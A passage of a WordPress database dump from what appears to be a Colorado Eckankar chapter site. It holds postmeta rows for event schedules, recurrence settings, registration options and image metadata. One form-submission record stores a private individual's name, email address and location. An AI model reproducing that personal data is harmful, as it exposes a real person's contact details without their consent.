"file\";s:24:\"kitty-flower-250x167.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:24:\"kitty-flower-270x180.jpg\";s:5:\"width\";i:270;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:24:\"kitty-flower-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(103324,130320,'_RTECregistrationsDisabled','1'),(103325,130320,'_RTECdeadlineType','start'),(103326,130320,'_RTECwhoCanRegister','any'),(103327,130320,'_RTEClimitRegistrations','0'),(103328,130320,'_RTECmaxRegistrations','30'),(88982,259137,'protect_children',''),(88983,259137,'_tribe_modified_fields','a:27:{s:16:\"protect_children\";i:1582816806;s:12:\"_EventOrigin\";i:1582816806;s:15:\"_EventStartDate\";i:1582817651;s:18:\"_EventStartDateUTC\";i:1582817651;s:13:\"_EventEndDate\";i:1582817651;s:16:\"_EventEndDateUTC\";i:1582817651;s:14:\"_EventDuration\";i:1582817651;s:13:\"_thumbnail_id\";i:1582816806;s:24:\"boldgrid_hide_page_title\";i:1582816806;s:17:\"_EventShowMapLink\";i:1582816806;s:13:\"_EventShowMap\";i:1582816806;s:13:\"_EventVenueID\";i:1582816806;s:20:\"_EventCurrencySymbol\";i:1582816806;s:22:\"_EventCurrencyPosition\";i:1582816806;s:10:\"_EventCost\";i:1582816806;s:9:\"_EventURL\";i:1582816806;s:14:\"_EventTimezone\";i:1582816806;s:27:\"_EventNextPendingRecurrence\";i:1582816806;s:20:\"_EventOriginalParent\";i:1582816806;s:12:\"_dp_original\";i:1582816806;s:10:\"_edit_last\";i:1582816873;s:10:\"post_title\";i:1582816874;s:12:\"post_content\";i:1582817692;s:16:\"tribe_events_cat\";i:1582842850;s:16:\"_EventRecurrence\";i:1582817651;s:11:\"post_status\";i:1582817651;s:18:\"_EventTimezoneAbbr\";i:1582817651;}'),(88984,259137,'_EventOrigin','events-calendar'),(88985,259137,'_EventStartDate','2020-03-29 13:30:00'),(88986,259137,'_EventStartDateUTC','2020-03-29 19:30:00'),(88987,259137,'_EventEndDate','2020-03-29 15:00:00'),(88988,259137,'_EventEndDateUTC','2020-03-29 21:00:00'),(88989,259137,'_EventDuration','5400'),(88990,259137,'_tribe_modified_fields','a:27:{s:16:\"protect_children\";i:1582816806;s:12:\"_EventOrigin\";i:1582816806;s:15:\"_EventStartDate\";i:1582817651;s:18:\"_EventStartDateUTC\";i:1582817651;s:13:\"_EventEndDate\";i:1582817651;s:16:\"_EventEndDateUTC\";i:1582817651;s:14:\"_EventDuration\";i:1582817651;s:13:\"_thumbnail_id\";i:1582816806;s:24:\"boldgrid_hide_page_title\";i:1582816806;s:17:\"_EventShowMapLink\";i:1582816806;s:13:\"_EventShowMap\";i:1582816806;s:13:\"_EventVenueID\";i:1582816806;s:20:\"_EventCurrencySymbol\";i:1582816806;s:22:\"_EventCurrencyPosition\";i:1582816806;s:10:\"_EventCost\";i:1582816806;s:9:\"_EventURL\";i:1582816806;s:14:\"_EventTimezone\";i:1582816806;s:27:\"_EventNextPendingRecurrence\";i:1582816806;s:20:\"_EventOriginalParent\";i:1582816806;s:12:\"_dp_original\";i:1582816806;s:10:\"_edit_last\";i:1582816873;s:10:\"post_title\";i:1582816874;s:12:\"post_content\";i:1582817692;s:16:\"tribe_events_cat\";i:1582842850;s:16:\"_EventRecurrence\";i:1582817651;s:11:\"post_status\";i:1582817651;s:18:\"_EventTimezoneAbbr\";i:1582817651;}'),(88995,259137,'_EventShowMapLink','1'),(88992,259137,'_EventOrigin','events-calendar'),(88994,259137,'boldgrid_hide_page_title','0'),(88996,259137,'_EventShowMap','1'),(88991,259137,'_tribe_modified_fields','a:27:{s:16:\"protect_children\";i:1582816806;s:12:\"_EventOrigin\";i:1582816806;s:15:\"_EventStartDate\";i:1582817651;s:18:\"_EventStartDateUTC\";i:1582817651;s:13:\"_EventEndDate\";i:1582817651;s:16:\"_EventEndDateUTC\";i:1582817651;s:14:\"_EventDuration\";i:1582817651;s:13:\"_thumbnail_id\";i:1582816806;s:24:\"boldgrid_hide_page_title\";i:1582816806;s:17:\"_EventShowMapLink\";i:1582816806;s:13:\"_EventShowMap\";i:1582816806;s:13:\"_EventVenueID\";i:1582816806;s:20:\"_EventCurrencySymbol\";i:1582816806;s:22:\"_EventCurrencyPosition\";i:1582816806;s:10:\"_EventCost\";i:1582816806;s:9:\"_EventURL\";i:1582816806;s:14:\"_EventTimezone\";i:1582816806;s:27:\"_EventNextPendingRecurrence\";i:1582816806;s:20:\"_EventOriginalParent\";i:1582816806;s:12:\"_dp_original\";i:1582816806;s:10:\"_edit_last\";i:1582816873;s:10:\"post_title\";i:1582816874;s:12:\"post_content\";i:1582817692;s:16:\"tribe_events_cat\";i:1582842850;s:16:\"_EventRecurrence\";i:1582817651;s:11:\"post_status\";i:1582817651;s:18:\"_EventTimezoneAbbr\";i:1582817651;}'),(87266,128672,'_EventOriginalParent','128619'),(87267,128672,'_edit_lock','1582840423:2'),(87256,128672,'_EventShowMapLink','1'),(87257,128672,'_EventShowMap','1'),(87258,128672,'_EventVenueID','52069'),(87259,128672,'_EventCurrencySymbol',''),(87260,128672,'_EventCurrencyPosition','prefix'),(13088,128672,'_EventStartDate','2020-03-21 19:00:00'),(13089,128672,'_EventStartDateUTC','2020-03-22 01:00:00'),(13090,128672,'_EventEndDate','2020-03-21 20:00:00'),(87276,128672,'_edit_last','2'),(13091,128672,'_EventEndDateUTC','2020-03-22 02:00:00'),(13092,128672,'_EventDuration','3600'),(87254,128672,'boldgrid_hide_page_title','0'),(87290,128672,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(87261,128672,'_EventCost',''),(87262,128672,'_EventURL',''),(87263,128672,'_EventTimezone','America/Denver'),(87264,128672,'_EventNextPendingRecurrence','2022-03-06 10:30:00'),(87265,128672,'protect_children',''),(87291,128672,'_EventTimezoneAbbr','MDT'),(129879,263590,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263590;a:2:{s:9:\"timestamp\";i:1616256000;s:8:\"duration\";i:3600;}i:263591;a:2:{s:9:\"timestamp\";i:1618675200;s:8:\"duration\";i:3600;}i:263592;a:2:{s:9:\"timestamp\";i:1621094400;s:8:\"duration\";i:3600;}i:263593;a:2:{s:9:\"timestamp\";i:1624118400;s:8:\"duration\";i:3600;}i:263594;a:2:{s:9:\"timestamp\";i:1626537600;s:8:\"duration\";i:3600;}i:263595;a:2:{s:9:\"timestamp\";i:1629561600;s:8:\"duration\";i:3600;}i:263596;a:2:{s:9:\"timestamp\";i:1631980800;s:8:\"duration\";i:3600;}i:263597;a:2:{s:9:\"timestamp\";i:1634400000;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(125486,263330,'_EventOrigin','events-calendar'),(125488,263330,'_RTECregistrationsDisabled','1'),(125489,263330,'_RTECdeadlineType','start'),(125490,263330,'_RTECwhoCanRegister','any'),(125491,263330,'_RTEClimitRegistrations','0'),(125492,263330,'_RTECmaxRegistrations','30'),(125484,263330,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(59554,245088,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:613;s:6:\"height\";i:377;s:4:\"file\";s:35:\"2020/01/activities-splash-sized.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"activities-splash-sized-300x185.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:185;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"activities-splash-sized-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"activities-splash-sized-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:33:\"activities-splash-sized-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:35:\"activities-splash-sized-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:35:\"activities-splash-sized-250x154.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:35:\"activities-splash-sized-550x338.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:35:\"activities-splash-sized-293x180.jpg\";s:5:\"width\";i:293;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:35:\"activities-splash-sized-488x300.jpg\";s:5:\"width\";i:488;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:35:\"activities-splash-sized-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:35:\"activities-splash-sized-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442700036\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(14068,128992,'_EventOrigin','events-calendar'),(103420,225321,'protect_children',''),(103421,225321,'_RTECregistrationsDisabled','1'),(103422,225321,'_RTECdeadlineType','start'),(119035,262961,'protect_children',''),(119029,262961,'_EventStartDate','2021-09-12 09:00:00'),(119030,262961,'_EventStartDateUTC','2021-09-12 15:00:00'),(119031,262961,'_EventEndDate','2021-09-12 10:15:00'),(119044,262961,'boldgrid_hide_page_title','0'),(119032,262961,'_EventEndDateUTC','2021-09-12 16:15:00'),(119033,262961,'_EventDuration','4500'),(119034,262961,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545354;s:16:\"protect_children\";i:1607545354;s:13:\"_thumbnail_id\";i:1607545354;s:26:\"_RTECregistrationsDisabled\";i:1607545354;s:17:\"_RTECdeadlineType\";i:1607545354;s:19:\"_RTECwhoCanRegister\";i:1607545354;s:23:\"_RTEClimitRegistrations\";i:1607545354;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(119036,262961,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545354;s:16:\"protect_children\";i:1607545354;s:13:\"_thumbnail_id\";i:1607545354;s:26:\"_RTECregistrationsDisabled\";i:1607545354;s:17:\"_RTECdeadlineType\";i:1607545354;s:19:\"_RTECwhoCanRegister\";i:1607545354;s:23:\"_RTEClimitRegistrations\";i:1607545354;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(119039,262961,'_RTECregistrationsDisabled','1'),(119040,262961,'_RTECdeadlineType','start'),(119041,262961,'_RTECwhoCanRegister','any'),(119042,262961,'_RTEClimitRegistrations','0'),(119043,262961,'_RTECmaxRegistrations','30'),(92581,261610,'_field_224','Reid'),(92582,261610,'_field_225','Heassler'),(92583,261610,'_field_226','jartzchongrh@live.com'),(92584,261610,'_field_227','CO'),(92585,261610,'_field_228','US'),(92586,261610,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(92587,261610,'_form_id','21'),(92588,261610,'_seq_num','96'),(92589,261611,'_wp_attached_file','2020/05/miracles_video-lg.jpg'),(92590,261611,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:397;s:6:\"height\";i:212;s:4:\"file\";s:29:\"2020/05/miracles_video-lg.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"miracles_video-lg-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"miracles_video-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:27:\"miracles_video-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:29:\"miracles_video-lg-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:29:\"miracles_video-lg-250x134.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:29:\"miracles_video-lg-337x180.jpg\";s:5:\"width\";i:337;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:29:\"miracles_video-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(92591,261611,'_edit_lock','1588438680:2'),(92592,261611,'original-file','2020/05/miracles_video-lg-updraft-pre-smush-original.jpg'),(92593,261611,'smush-complete','1'),(92594,261611,'smush-info','The file was compressed from 39.40 KB to 36.95 KB saving 6.2 percent using WP-Optimize'),(92595,261611,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:40342;s:12:\"smushed-size\";i:37840;s:15:\"savings-percent\";d:6.2;}'),(92292,261555,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(92293,261555,'_form_id','21'),(92294,261555,'_seq_num','95'),(92303,261549,'_wp_page_template','default'),(92304,261549,'boldgrid_hide_page_title','0'),(92305,261549,'boldgrid_in_page_containers','1'),(92306,261549,'bgseo_robots_index','index'),(92307,261549,'bgseo_robots_follow','follow'),(92308,261564,'protect_children',''),(92309,261564,'_edit_lock','1586745303:2'),(92310,261564,'_edit_last','2'),(92311,261564,'meta-image','https://eckankar-colorado.org/wp-content/uploads/2019/10/RESA-Org-Chart-9.22.18.pdf'),(92318,261564,'pdfp_onei_pp_height','800'),(92313,261564,'boldgrid_hide_page_title','1'),(92319,261564,'pdfp_onei_pp_print','on'),(162545,247342,'_wp_old_date','2022-02-18'),(188276,268838,'mec_start_date','2023-08-23'),(188277,268838,'mec_start_time_hour','1'),(188250,268837,'_edit_lock','1691169876:2'),(188251,268837,'_edit_last','2'),(188252,268838,'protect_children',''),(188253,268838,'mec_color',''),(188254,268838,'mec_location_id','198'),(188255,268838,'mec_dont_show_map','0'),(188256,268838,'mec_organizer_id','1'),(188257,268838,'mec_read_more',''),(188258,268838,'mec_more_info',''),(188259,268838,'mec_more_info_title',''),(188260,268838,'mec_more_info_target','_self'),(188261,268838,'mec_cost',''),(188262,268838,'mec_currency','a:0:{}'),(188263,268838,'mec_additional_organizer_ids','a:0:{}'),(188264,268838,'mec_additional_location_ids','a:0:{}'),(188265,268838,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-23\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-23\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(188266,268838,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(188267,268838,'mec_certain_weekdays','a:0:{}'),(188268,268838,'mec_allday','0'),(188269,268838,'one_occurrence','0'),(188270,268838,'mec_hide_time','0'),(188271,268838,'mec_hide_end_time','0'),(188272,268838,'mec_comment',''),(188273,268838,'mec_timezone','global'),(188274,268838,'mec_countdown_method','global'),(188275,268838,'mec_public','1'),(188231,268837,'passster_activate_global_protection',NULL),(188232,268837,'passster_activate_protection',NULL),(188233,268837,'passster_protection_type','password'),(188234,268837,'boldgrid_in_page_containers','1'),(188235,268837,'passster_area_shortcode',''),(188236,268837,'_wp_old_date','2023-01-14'),(188237,268837,'mec_cost_auto_calculate','0'),(188238,268837,'mec_style_per_event','global'),(188239,268837,'mec_trailer_url',''),(188240,268837,'mec_trailer_title',''),(188241,268837,'mec_start_datetime','2023-08-16 01:00 PM'),(188242,268837,'mec_end_datetime','2023-08-16 02:30 PM'),(188243,268837,'mec_sequence','20'),(188244,268837,'mec_event_gallery','a:0:{}'),(188245,268837,'mec_related_events','a:0:{}'),(188246,268837,'mec_banner','a:0:{}'),(188247,268837,'_thumbnail_id','268836'),(188249,268837,'_dp_original','268835'),(14070,128992,'_EventOrigin','events-calendar'),(103385,114734,'_RTEClimitRegistrations','0'),(103386,114734,'_RTECmaxRegistrations','30'),(14073,128992,'boldgrid_hide_page_title','0'),(14074,128992,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(103094,128992,'_EventHideFromUpcoming','yes'),(14075,128992,'_EventShowMapLink','1'),(14076,128992,'_EventShowMap','1'),(14077,128992,'_EventVenueID','52069'),(14078,128992,'_EventStartDate','2019-08-18 10:30:00'),(14079,128992,'_EventEndDate','2019-08-18 11:30:00'),(14080,128992,'_EventStartDateUTC','2019-08-18 16:30:00'),(14081,128992,'_EventEndDateUTC','2019-08-18 17:30:00'),(14082,128992,'_EventDuration','3600'),(14083,128992,'_EventCurrencySymbol',''),(14084,128992,'_EventCurrencyPosition','prefix'),(14085,128992,'_EventCost',''),(14086,128992,'_EventURL',''),(14087,128992,'_EventTimezone','America/Denver'),(14088,128992,'_EventTimezoneAbbr','MDT'),(97161,128992,'_EventNextPendingRecurrence','2022-12-18 10:30:00'),(14090,128992,'_dp_original','128736'),(14091,128992,'_edit_lock','1606947493:2'),(14092,128992,'_edit_last','2'),(27445,198744,'_wp_attached_file','2019/10/kitty-flower.jpg'),(27225,184313,'_edit_lock','1570832434:2'),(14731,129179,'_EventOrigin','events-calendar'),(14732,129179,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";d:1566041362;s:13:\"_thumbnail_id\";d:1566041362;s:24:\"boldgrid_hide_page_title\";d:1566041362;s:16:\"_EventRecurrence\";i:1606922281;s:17:\"_EventShowMapLink\";d:1566041362;s:13:\"_EventShowMap\";d:1566041362;s:13:\"_EventVenueID\";d:1566041362;s:15:\"_EventStartDate\";i:1577651821;s:13:\"_EventEndDate\";i:1577651821;s:18:\"_EventStartDateUTC\";i:1577651821;s:16:\"_EventEndDateUTC\";i:1577651821;s:14:\"_EventDuration\";i:1577651821;s:20:\"_EventCurrencySymbol\";d:1566041362;s:22:\"_EventCurrencyPosition\";d:1566041362;s:10:\"_EventCost\";d:1566041362;s:9:\"_EventURL\";d:1566041362;s:14:\"_EventTimezone\";d:1566041362;s:18:\"_EventTimezoneAbbr\";i:1577651821;s:27:\"_EventNextPendingRecurrence\";i:1605018033;s:12:\"_dp_original\";d:1566041362;s:16:\"tribe_events_cat\";i:1606947481;s:10:\"_edit_last\";d:1566041428;s:10:\"post_title\";d:1566041428;s:12:\"post_content\";i:1580468535;s:11:\"post_status\";d:1566041616;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922294;s:16:\"protect_children\";i:1577651821;s:26:\"_RTECregistrationsDisabled\";i:1606922281;s:17:\"_RTECdeadlineType\";i:1606922281;s:19:\"_RTECwhoCanRegister\";i:1606922281;s:23:\"_RTEClimitRegistrations\";i:1606922281;s:21:\"_RTECmaxRegistrations\";i:1606922281;s:22:\"_EventHideFromUpcoming\";i:1606922281;}'),(14733,129179,'_EventOrigin','events-calendar'),(14734,129179,'_EventOrigin','events-calendar'),(14735,129179,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";d:1566041362;s:13:\"_thumbnail_id\";d:1566041362;s:24:\"boldgrid_hide_page_title\";d:1566041362;s:16:\"_EventRecurrence\";i:1606922281;s:17:\"_EventShowMapLink\";d:1566041362;s:13:\"_EventShowMap\";d:1566041362;s:13:\"_EventVenueID\";d:1566041362;s:15:\"_EventStartDate\";i:1577651821;s:13:\"_EventEndDate\";i:1577651821;s:18:\"_EventStartDateUTC\";i:1577651821;s:16:\"_EventEndDateUTC\";i:1577651821;s:14:\"_EventDuration\";i:1577651821;s:20:\"_EventCurrencySymbol\";d:1566041362;s:22:\"_EventCurrencyPosition\";d:1566041362;s:10:\"_EventCost\";d:1566041362;s:9:\"_EventURL\";d:1566041362;s:14:\"_EventTimezone\";d:1566041362;s:18:\"_EventTimezoneAbbr\";i:1577651821;s:27:\"_EventNextPendingRecurrence\";i:1605018033;s:12:\"_dp_original\";d:1566041362;s:16:\"tribe_events_cat\";i:1606947481;s:10:\"_edit_last\";d:1566041428;s:10:\"post_title\";d:1566041428;s:12:\"post_content\";i:1580468535;s:11:\"post_status\";d:1566041616;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922294;s:16:\"protect_children\";i:1577651821;s:26:\"_RTECregistrationsDisabled\";i:1606922281;s:17:\"_RTECdeadlineType\";i:1606922281;s:19:\"_RTECwhoCanRegister\";i:1606922281;s:23:\"_RTEClimitRegistrations\";i:1606922281;s:21:\"_RTECmaxRegistrations\";i:1606922281;s:22:\"_EventHideFromUpcoming\";i:1606922281;}'),(103168,129179,'_RTECdeadlineType','start'),(125466,263329,'_RTEClimitRegistrations','0'),(125467,263329,'_RTECmaxRegistrations','30'),(124746,263327,'_EventDuration','5400'),(129856,263590,'protect_children',''),(124745,263327,'_EventEndDateUTC','2021-04-13 02:30:00'),(124743,263327,'_EventStartDateUTC','2021-04-13 01:00:00'),(124744,263327,'_EventEndDate','2021-04-12 20:30:00'),(125386,263326,'_EventOrigin','events-calendar'),(125394,263326,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(125385,263326,'_EventOrigin','events-calendar'),(125395,263326,'_EventShowMapLink','1'),(125396,263326,'_EventShowMap','1'),(125397,263326,'_EventVenueID','262507'),(125398,263326,'_EventCurrencySymbol',''),(125399,263326,'_EventCurrencyPosition','prefix'),(125400,263326,'_EventCost',''),(125401,263326,'_EventURL',''),(125402,263326,'_EventTimezone','America/Denver'),(125403,263326,'_dp_original','263319'),(125404,263326,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:12:{i:263323;a:2:{s:9:\"timestamp\";i:1607972400;s:8:\"duration\";i:5400;}i:263324;a:2:{s:9:\"timestamp\";i:1610391600;s:8:\"duration\";i:5400;}i:263325;a:2:{s:9:\"timestamp\";i:1612810800;s:8:\"duration\";i:5400;}i:263326;a:2:{s:9:\"timestamp\";i:1615230000;s:8:\"duration\";i:5400;}i:263327;a:2:{s:9:\"timestamp\";i:1618254000;s:8:\"duration\";i:5400;}i:263328;a:2:{s:9:\"timestamp\";i:1620673200;s:8:\"duration\";i:5400;}i:263329;a:2:{s:9:\"timestamp\";i:1623697200;s:8:\"duration\";i:5400;}i:263330;a:2:{s:9:\"timestamp\";i:1626116400;s:8:\"duration\";i:5400;}i:263331;a:2:{s:9:\"timestamp\";i:1628535600;s:8:\"duration\";i:5400;}i:263332;a:2:{s:9:\"timestamp\";i:1631559600;s:8:\"duration\";i:5400;}i:263333;a:2:{s:9:\"timestamp\";i:1633978800;s:8:\"duration\";i:5400;}i:263334;a:2:{s:9:\"timestamp\";i:1636398000;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:12;}'),(125380,263326,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s